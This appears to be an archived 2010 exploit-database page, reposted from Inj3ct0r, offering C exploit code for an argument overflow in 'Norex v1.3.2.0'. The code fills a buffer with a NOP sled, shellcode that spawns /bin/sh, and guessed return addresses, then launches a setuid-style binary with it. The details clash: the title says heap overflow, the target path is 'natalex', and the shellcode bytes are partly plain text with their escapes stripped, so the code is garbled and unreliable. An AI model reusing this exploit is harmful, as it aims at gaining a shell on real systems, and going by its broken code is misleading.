Home / os / win7

Norex v1.3.2.0 Argument Heap-Overflow Vulnerability

Posted on 23 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Norex v1.3.2.0 Argument Heap-Overflow Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
Norex v1.3.2.0 Argument Heap-Overflow Vulnerability
===================================================


# Author: SiktirEdenzi aka GoteGELENZI
# Software Link: http://www.muratkaslioglu.com/norex/
# Version: v1.3.2.0
# Tested on: Linux
# CVE :
# Code :
 
 
#define PATH_ZEN &quot;/usr/bin/natalex -r&quot;
#define OFFER_SIZE 1024
#define DEFAULT_OFFSET 50
 
u_long get_esp()
{
__asm__(&quot;movl %esp, %eax&quot;);
 
}
 
main(int argc, char **argv)
{
u_char execshell[] =
&quot;xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f&quot;
&quot;xb8x1bx56x34x12x62x1fx74x1fx6ex20x62x65x79x61x7a&quot;
&quot;x20x1fx61x70x6bx61x6cx61x72x20x61x6ex61x6ex1fx7a&quot;
&quot;x1fx20x73x69x6bx65x6ex7ax69x2cx20x68x75x7ax65x79&quot;
&quot;x66x65x20x73x65x6cx61x6dx6cx61x72x20x64x6fx73x74&quot;
&quot;x75x6dx20x6cx6fx6cx27x64x35x10x56x34x12x8dx4ex0b&quot;
&quot;x8bxd1xcd&quot;
&quot;x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh&quot;;
 
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
 
int i;
int ofs = DEFAULT_OFFSET;
 
buff = malloc(4096);
if(!buff)
{
printf(&quot;can't allocate memory
&quot;);
exit(0);
}
ptr = buff;
 
 
memset(ptr, 0x90, OFFER_SIZE-strlen(execshell));
ptr += OFFER_SIZE-strlen(execshell);
 
 
 
for(i=0;i &lt; strlen(execshell);i++)
*(ptr++) = execshell[i];
 
addr_ptr = (long *)ptr;
for(i=0;i &lt; (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
 
(void)alarm((u_int)0);
execl(PATH_ZEN, &quot;umount&quot;, buff, NULL);
}



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :